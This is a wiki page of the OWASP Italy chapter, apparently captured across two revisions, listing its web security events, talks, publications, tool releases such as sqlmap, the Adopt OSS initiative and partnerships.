The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation [http://www.owasp.org/images/a/aa/Top10-ComputerCrimes.ppt here].

=== March 31th, 2005 - ISACA Rome meeting ===

----

March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda: 14.15 Registration 14.30 Matteo Meucci - Web Application Security - OWASP Guide: how to build secure web application - How to test your Web Application: WebScarab and the WebApp PenTest Checklist - How to learn the most common web application vulnerability: WebGoat - The Top Ten WebApp vulnerabilities - Common error on developing Web Application: Authentication mechanisms not "secure" Buffer Overflow and crash of the service Thief of identity: Cross Site Scripting Manipulation of company data: SQL Injection Reserved information: misconfiguration Bad session management and thief of identity - OWASP-Italy: projects and next challenges

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation [http://www.isacaroma.it/pdf/050331/meucci.zip here].

=== March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb ===

----

March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to [http://www.almaweb.unibo.it/830.dyn Master in Management and Information Technology] titled “Web Application Security and OWASP”.

Here is the agenda: - OWASP & Web Application Security - Common Web Application Vulnerabilities - A real case of web application vulnerability: MMS Spoofing&Billing - Training: WebGoat

==== Publications ====

=== October 2009 Interview on "Il sole 24 ore" ===
----

[http://www.owasp.org/images/5/5c/Nova09.pdf Gary McGraw and Matteo Meucci] interviewed by NOVA, talking about BSIMM and OWASP.

=== March, 2007 Interview on HTML.it ===

----

Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) ) [http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

=== October, 2006 ISACA Roma interviews OWASP-Italy ===

----

After the speeches that OWASP-Italy has done at [http://www.smau.it/catnews.asp?l=2&codcat=385 SMAU E-Academy 2006], ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian): [[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli ]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/322 Stefano Di Paola & Giorgio Fedon]]

=== Aug, 2006 - Article on Banca Finanza magazine ===

----

Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

=== June, 2006 - Quaderno CLUSIT ===

----

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

=== June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference ===

----

Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform. [http://www.ictsc.it/papers/sqlInferenceOnMySql.html Here]you can read the full article.

=== May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities ===

----

Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

=== June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian ===

----

Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it [http://www.owasp.org/documentation/testing.html here.] Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

=== May, 2005 - Isaca Roma Newsletter about OWASP-Italy ===

----

ISACA Roma Newsletter has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

=== April, 2005 - Published "MMS Spoofing" ===

----

We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78): "Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See: www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

=== April, 2005 - Published an article on ICT Security magazine ===

----

We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

=== March, 2005 - OWASP Top-10 in Italian ===

----

Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

 

----

==== Tools & Research ====

----

=== Nov, 2007 - sqlmap v0.5 ===

Bernardo Damele and Daniele Bellucci have released the fifth versions of the tool [http://sqlmap.sourceforge.net sqlmap]. sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 SourceForge File List page] or the latest development version from its [https://sqlmap.svn.sourceforge.net/svnroot/sqlmap SourceForge SVN repository].

=== Dec, 2006 - sqlmap v0.2 ===

Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://sqlmap.sourceforge.net/ Here] you can download the tool

=== September, 2006 - Wisec Project ===

Stefano Di Paola is developing Wisec - The Wiki Security Project [http://www.wisec.it Here] you can accesses the project.

=== July, 2006 - Sqlmap v0.0.1 ===

Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://www.linux.it/~belch/?p=17 Here] you can download the tool

----

__NOTOC__ <headertabs />

[[Category:OWASP_Chapter]]
[[Category:Europe]]

Italy

2015-05-15T07:27:41Z

Ikkisoft: Adopt OSS section

<center>[[Image:OWASP-Italy.PNG]] </center>

==== WELCOME ====

{{Chapter Template|chaptername=Italy|extra=The chapter leader is [mailto:matteo.meucci@gmail.com Matteo Meucci]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-italy|emailarchives=http://lists.owasp.org/pipermail/owasp-italy}}

<paypal>Italy</paypal>
 

== Adopt OSS, May-November 2015 ==

OWASP Italy is pleased to announce a new initiative: '''Adopt''' '''O'''pen'''S'''ource'''S'''oftware 

Given OWASP’s mission to help organizations with application security, we have established a new initiative to provide free, voluntary-based support to open source software projects. 

Thanks to Adopt OSS, security enthusiasts are paired with participating open source projects, thus gaining exposure to real-life security engineering challenges and the opportunity for career growth. In turn, the participating projects are able to obtain free professional expertise to better improve their security posture, and ultimately build secure software. Over a six months period, OWASP Italy will facilitate the effort by coordinating the initiative and providing support when needed. 

The first edition of this initiative will take place between ''May and November 2015'', and will see the participation of '''7 OWASP Italy members''' and '''3 major OpenSource projects'''. At the end of the six months period, OWASP Italy will publish results and feedback from both volunteers and OSS maintainers. 

The official flyer can be [https://www.owasp.org/images/0/07/AdoptOSSManifest-OWASPItaly.pdf downloaded from here].

===Ntopng===
''Alessio Petracca, Mattia Folador'' 

[http://www.ntop.org/products/traffic-analysis/ntop/ Ntop] is the de-facto standard for real-time network traffic monitoring. OWASP Italy wants to help the project by increasing the security level of ntopng, performing security testing activities and supporting the remediation process. 

We will act in two steps:
* First, a penetration test targeting the web interface of ntopng will be performed, following the [https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents OWASP Testing Methodology]
* Secondly, source code review of ntopng main components (such as the C++ core engine) will be statically reviewed. The objective is to address all relevant checks contained within the [https://www.owasp.org/index.php/OWASP_Code_review_V2_Table_of_Contents OWASP Code Review Guide]

In case the activities above are completed before the end of the six-months period, additional activities (such as the development of security plugins) will be discussed.
Luca Deri and Arianna Avanzini will support Alessio Petracca and Mattia Folador in these activities, by providing guidance and insights.

===WordPress===
''Paolo Perego, Sandro Zaccarini'' 

[https://wordpress.org/ WordPress] is the facto standard for web publishing. If you need a blog, if you need a new showcase website for your portfolio or a tiny e-commerce web site for your small company you will look at WordPress to start. 

Paying the cost to be the boss, WordPress during the years suffered tons of security issues, 3 major issues only in the beginning of May 2015. Either the core, plugins and themes are developed with easy to use in mind and they need to be hardened. 

OWASP Italy wants to support WordPress adopting it with the "Stand by WordPress" initiative. We will deploy the software in three different standard configurations: blog, company's portfolio and e-commerce. 

We will do continuous appsec during development of 4.3 version in order to quickly spot security issues before the August release. In addition, we will take care of hardening guidelines and both plugins and themes subsystems in order to improve overall architecture security level.

===GlobaLeaks===
''Luca Carettoni, Giovanni Cerrato, Marco Lancini''

[https://www.globaleaks.org/ GlobaLeaks] is the first open-source whistleblowing framework. It empowers anyone to easily set up and maintain an anonymous whistleblowing platform. 

Considering the potential hostile environments in which the application may be hosted, security vulnerabilities and abuses are primary concerns for GlobaLeaks’ maintainers. 

We want to help the team in their excellent application security practices, by performing vulnerability research activities in order to discover unknown bugs within the boundaries of their specific [https://docs.google.com/document/d/1niYFyEar1FUmStC03OidYAIfVJf18ErUFwSWCmWBhcA/pub threat model]. In particular, we will be focusing on two main software components (GLBackend and GLClient) and new security-relevant changes (upcoming authentication re-factoring and end-to-end encryption). 

For more information on '''Adopt OSS''', please send an email to [mailto:owasp-italy@lists.owasp.org owasp-italy@lists.owasp.org]
 

== OWASP-Isaca Conference @ Rome 11-12th December 2014 ==
The agenda is online! 
http://www.isacaroma.it/images/owasp_agenda_11-12-12-2014.JPG

 

== OWASP-Isaca Conference @ Venice 3rd October 2014 ==
The agenda: 
[[File:Venice2014.jpg]]
 
Here is the [https://www.owasp.org/images/d/d3/OWASPVenice2014.pdf flyer]

== OWASP-Italy Day @ the University of Genova (14th May 2014) ==
Thank to the collaboration with [http://www.ai-lab.it/armando Prof. Alessandro Armando] and to the availability of Gary McGraw, Ph.D. CTO, Cigital we are planning an incredible [https://www.owasp.org/index.php/Italy_OWASP_Day_2014_Genova OWASP Day next 14th May].
 

 
== OWASP Italy @ Security Summit 2014 ==
OWASP Italy participated to the Security Summit 2014 in Milan with 3 talks. 
[https://www.securitysummit.it/milano-2014/seminari-associazioni/talk-34/ See here for all the details] 
 

== OWASP EU Tour 2013 - 27th June - Rome==

<noinclude>{{:EUTour2013 header}}</noinclude>

Thanks to the collaboration with Università Degli Studi Roma Tre, next 27th June we will have the OWASP EU Tour Rome Conference. 
OWASP Europe TOUR, is an event across the European region that promotes awareness about application security, so that people and organizations can make informed decisions about true application security risks. Everyone is free to participate in OWASP and all of our materials are available under a free and open software license.

The conference will be held at Università Degli Studi Roma Tre. Address: Via Vito Volterra, 62, Rome.

[https://www.owasp.org/index.php/EUTour2013_Rome_Agenda Here you can find the agenda and all the information to participate]

== OWASP Italy @ Security Summit 2013 ==

OWASP Italy participated to the Security Summit 2013 in Milan with 2 talks. 
[http://milano2013.securitysummit.it/eventi/view/35 See here for all the details] 

== OWASP Italy Day 2012: "Web Security in a Mobile World" ==

<center>[[File:OWASPITDay2012.jpg]] </center>

We are pleased to announce that the [http://www.owasp.org/index.php/Italy OWASP Italy chapter] will host the OWASP Italy Day 2012 conference in Rome, Italy at the University of Rome La Sapienza next 23rd November 2012.

More information [https://www.owasp.org/index.php?title=Italy_OWASP_Day_2012 here]

== OWASP-Italy Board ==

*This is the '''OWASP-Italy Board''':
Founder and Chair: Matteo Meucci (Jan 2005) 
OWASP Italy Board: Paolo Perego, Luca Carettoni, Antonio Parata, Giorgio Fedon, Stefano Di Paola, Mauro Bregolin, Claudio Merloni, Raoul Chiesa.

==== Partnerships ====

*ISC2-Italian Chapter: Thanks to Marco Misitano, Paolo Ottolino and Claudio Sasso, OWASP Italy collaborates with the ISC2-Italian Chapter for new initiatives regarding Security Conferences, articles and contentes regarding SDLC.

[http://www.isc2chapter-italy.it https://www.owasp.org/images/a/a3/ISC2Italy.jpg]

*CSA Italy Partnership

[http://chapters.cloudsecurityalliance.org/italy/ https://www.owasp.org/images/6/6a/CSAItalylogo.gif]

Thanks to Alberto Manfredi (CSA Italy President) we are starting a collaboration with the Italian Chapter of the Cloud Security Alliance.

*IsecLab Partnership

[http://www.iseclab.org http://www.owasp.org/images/4/4b/LogoIsecLab.png]

We are beginning a collaboration with David Balzarotti and Marco Balduzzi of International Secure Systems Lab(IsecLab) with the goal of sharing and improving new WebAppSec projects. 

*CLUSIT Member

http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations. So OWASP-Italy is now a [http://www.clusit.it/soci.htm CLUSIT member] and CLUSIT is an OWASP Educational Member.

*ISACA Rome

[http://www.isacaroma.it http://www.owasp.org/images/9/98/Isacaroma.gif]

Thanks to Ugo Spaziani, we are developing seminars and new ideas with ISACA Rome. 

==== News ====

== Security Summit 2012 ==
- 21st March 2012, OWASP Italy will present 3 talks:

- Antonio Parata e Paolo Perego:"Security Testing for developers" 
- Giorgio Fedon: "Banking Malware evolution in Italy: defense approach" 
- Stefano Di Paola:"DOM Xss: la nuova generazione di vulnerabilità applicative" 
Please subscribe for free here: https://www.securitysummit.it/eventi/view/21

== Security Summit 2011 ==
- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

'''OWASP Books are out!'''

Now you can download or buy a book on the OWASP Projects. Check it here: http://stores.lulu.com/owasp

==== Activities ====

*(Jun 10): OWASP Testing Guide presentation at FBK (Fondazione Bruno Kessler).

*(May 10): OWASP Training at London: last 28th May in London, OWASP leaders deliver a course focused on the main OWASP Projects. This course aims to change that by providing a selection of mature and enterprise ready projects together with practical examples of how to use them.
This Course was FREE for OWASP Members.
http://www.owasp.org/index.php/London/Training/OWASP_projects_and_resources_you_can_use_TODAY

*(Jan 09) OWASP Testing Guide v3 is finished! You can download or browse it [http://www.owasp.org/index.php/Category:OWASP_Testing_Project here]

*(Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )

[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

*(Oct 06) ISACA Roma has published several interview with OWASP-Italy members:

[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/328 Carlo Pelliccioni]] 

*(Sep 06) Paolo Perego has created the new '''OWASP Orizon Project'''. Go to [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project OWASP Orizon Project] 

*(Sep 06) Matteo Meucci has been selected as the new editor of the '''OWASP Testing Guide v2'''. See OWASP [http://www.owasp.org/index.php/OWASP_Autumn_Of_Code_2006_:_Selected_Projects_Press_Release press release] and go to [http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Project v2]

*(Sep 06) Carlo Pelliccioni is writing an article about the [http://www.owasp.org/index.php/Analysis_about_error_codes analysis of error codes] received by web servers.

*Top10 Vulnerabilities - OWASP-Italy survey:

[[Image:Top 10 vulnerabilities-mini.GIF]]

*(21 Jun 06) '''Infosecurity 2006''': the event is organized and managed by the CLUSIT.

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". [http://www.infosecurity.it/Roma/programma.php More info here]

*(1 Jun 06) '''"Quaderno CLUSIT"'''

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.

*(31 May 06) Luca Carettoni has published the article '''"La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project".''' [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

*(1 Mar 06) '''OWASP-Boston, Microsoft'''

Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting. [http://www.owasp.org/local/boston.html More info here]

*(18 Nov 05) '''IDC - European Banking Forum'''

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the [http://www.idc.com/italy/events/banking05/banking05_agenda.jsp IDC European IT Banking Forum 2005]. Agenda: - New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair - Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy

*(Oct 05) '''SMAU 2005''' is the 42a International ICT & Consumer Electronics Exhibition for Italy.

SMAU has accepted our submission! [http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili More info here]

*(Giu 05) Thanks to Massimiliano Graziani we have translated in italian the '''"OWASP Pen Test Checklist v.1.1"'''. You can download it [http://www.owasp.org/documentation/testing.html here.]

Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

*(May 05) '''ISACA Roma Newsletter''' has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

*(Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

*The presentation of the seminar we have done in '''ISACA Rome''' (31th March 2005) is now available [http://www.isacaroma.it/pdf/050331/meucci.zip here.]

*(Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

*(Mar 05) Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

*[http://www.isacaroma.it/html/newsletter/?q=node/78 Here] you can read an interview talking about OWASP.

==== Events ====

=== 15th March, 2011 - OWASP-Italy@Security Summit ===

- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

=== November, 2010 - OWASP-Italy Day V ===

- OWASP Day for E-Gov 2010: 9th November 2010 - Rome. 
An event organized by Consip. More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_10 here]

=== November, 2009 - OWASP-Italy Day IV ===

----
Following on from the great success of last OWASP Days the forth conference has taken place in November 2009 in Milan. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_4 here] 

OWASP Day for E-Gov 2009: 5th November 2009 - Rome. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_09 here]

=== 31st March, 2009 - OWASP-Italy @ PCI Milan ===

----

Matteo Meucci was invited to talk about OWASP Testing Guide and PCI-DSS Standard at the [http://www.pci-portal.com/lang-en/events/event-info/pcimilan PCI Milan event] last 31st March.

The presentation is published [http://www.owasp.org/images/3/38/MeucciPciMilan09.pdf here]

=== 23rd February, 2009 - OWASP Day III ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_3 "Web Application Security: research meets industry"] Presentations are online!

=== 10th October, 2008 - Isaca Roma PCM 2008 ===

----

Matteo Meucci presented the new OWASP Projects and the Application Security in the Italian Companies. More information [http://www.isacaroma.it/html/ArchivioEventi-081010.html here]

=== 31st March, 2008 - OWASP Day II ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_2 "The State of the Art of the Web Application Security and the OWASP guidelines in the Companies"] Presentations are online!

=== February 2008 - OWASP Italy at InfoSecurity 2008 ===

----

5th February:

*14:30 - The Owasp Orizon project: internals and hands on

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_94.aspx Paolo Perego]

6th February:

*14:30 - Costruire Software Sicuro dalle Fondamenta

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_128.aspx Antonio Parata]

7th February:

*10:30 - Tu programmi. Io buco.

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_137.aspx Luca Carettoni]

[http://www.infosecurity.it Here] you can read more information about it.

 

=== November 30th, 2007 - OWASP-Italy @ Elsag Datamat Security Forum ===

----

Matteo Meucci was invited to talk about OWASP Guidelines and SDLC Security at the Elsag Datamat Security Forum 2007 Where: Pescara When: 30th November 2007, h.12.30

=== October 20th, 2007 - OWASP Italy at SMAU E-Academy 2007 ===

----

Last 20th October 2007 we had 5 speeches at SMAU E-Academy 2007, here you can download our presentations:

*Giorgio Fedon, COO at Minded Security:

[http://www.owasp.org/.pdf "Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting"] (coming soon) [[Image:FedonSMAU07.pdf]]

*Paolo Perego, Senior Security Consultant at Spike Reply:

[https://www.owasp.org/images/7/79/PeregoSMAU07.ppt "The Owasp Orizon project - bring security at the source"]

*Antonio Parata, Security Consultant at eMaze:

"Valutazione del rischio tramite la logica fuzzy" (coming soon) [[Image:ParataSMAU07.pdf]]

*Alberto Revelli, Senior Security Consultant at Portcullis Security:

[http://www.owasp.org/images/9/9f/RevelliSMAU07.pdf "Anti-Anti-XSS: bypass delle difese del browser"]

*Stefano Di Paola, CTO at Minded Security:

"Cros-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" (coming soon) [[Image:DiPaolaSMAU07.pdf]]

 

=== September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ===

----

https://www.owasp.org/index.php/Italy_OWASP_Day_1

 

=== May 29th, 2007 - Seminar: "Software Security" ===

----

*Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: [http://www.sicurinfo.it/informazioni/visinf.asp?IDInfo=246&CAT=53 "Which approaches to Software Security"] organized by Firenze Tecnologia.

 

=== May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy ===

----

*We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.

[http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007 Here] you can find all the details about the conference, cfp and sponsorship.

=== April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza" ===

----

*We have done a 4h seminar for the students of [http://mastersicurezza.uniroma1.it/ Master on Information Security at "La Sapienza"] for the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=projects:asp Application Security Project of "La Sapienza" University.]

 

=== March 30th, 2007 - University of Rome "La Sapienza" ===

----

*Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"

[http://w3.uniroma1.it/security/Eventi/eventi.html Here] you can find more details.

 

=== March 1st, 2007 - EuSecWest 07 ===

----

Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at [http://www.eusecwest.com/agenda.html EUSecWest]. [http://www.owasp.org/images/e/e9/OWASP_Testing_Guide_Presentation_EUSecWest07.zip Here] you take a look at the presentation.

=== February 6th-8th, 2007 - InfoSecurity ===

----

*February 6th:15.30

After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0" More information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=aqfi82GOKd6I748s1evI8Q%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 6th:16.30

After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=nq6tSIuRoPVJBanBSsRiSQ%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 7th:12.30

Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies." More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=3z04F5BgZRgfU0YX8JRYtA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here]

*February 7th:13.30

Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=9HePIzyo5p29ylpGBl6CiA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

=== January 25th, 2007 - Isaca Rome ===

----

Matteo Meucci will discuss the new [http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide v2] For more information: http://www.isacaroma.it/html/GiornateDiStudio.html

=== October 7th, 2006 - SMAU 2006 ===

----

- "''The quest for secure code: code review and fundamental of secure coding.''" Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities. Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases http://www.webb.it/event/eventview/5772

Here are the presentations: [[Image:Meucci SMAU06.pdf|Meucci_SMAU06]] [[Image:Perego SMAU06.pdf|Perego_SMAU 06]]

- "''Advanced SQL Injection.''" Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing. Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" ! http://www.webb.it/event/eventview/5774

[[Image:Revelli SMAU06.pdf|Revelli_SMAU06]] [[Image:Parata SMAU06.pdf|Parate_SMAU06]] 

[[Image:OWASP-Italy at SMAU06 2.JPG]] Luca, Carlo, Alberto, Antonio, Stefano Matteo, Paolo, Giorgio

=== September 29th, 2006 - OpenExp 2006 ===

----

September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security. It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs. http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.

[[Image:Antonio Matteo Carlo.JPG]] [[Image:Antonio speech.JPG]] [[Image:Carlo.JPG]] [[Image:Claudio Luca.JPG]] [[Image:Mayhem Matteo.JPG]] [[Image:OWASP Banner2.JPG]] [[Image:OWASP Banner.JPG]]

=== June 21th, 2006 - InfoSecurity 2006 ===

----

